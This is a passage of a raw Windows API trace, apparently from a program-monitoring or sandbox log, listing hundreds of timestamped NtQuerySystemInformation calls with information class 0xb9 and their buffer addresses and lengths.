(SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0286.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0286.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0286.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x20, ResultLength=0x0) [0286.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0286.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0286.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce08, Length=0x58, ResultLength=0x0) [0286.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0286.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0286.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0286.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0286.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0286.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0286.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0286.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0286.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0286.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0286.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0286.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0286.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0286.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0286.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0286.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0286.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0286.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0286.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0286.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0286.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0286.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0286.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0286.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0286.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0286.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0286.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0286.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0286.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0286.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0286.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0286.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce08, Length=0x58, ResultLength=0x0) [0286.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0286.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0286.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0286.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0286.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0286.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0286.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x28, ResultLength=0x0) [0286.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0286.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0286.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0286.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0286.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0286.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0286.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0286.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0286.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0286.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0286.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0286.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0286.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0286.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0286.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0286.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x28, ResultLength=0x0) [0286.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0286.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0286.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0286.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0286.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c930, Length=0x20, ResultLength=0x0) [0286.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c930, Length=0x20, ResultLength=0x0) [0286.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c930, Length=0x20, ResultLength=0x0) [0286.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0286.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0286.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0286.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0286.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0286.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0286.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0286.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0286.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0286.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0286.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0286.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x28, ResultLength=0x0) [0286.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0286.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0286.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, 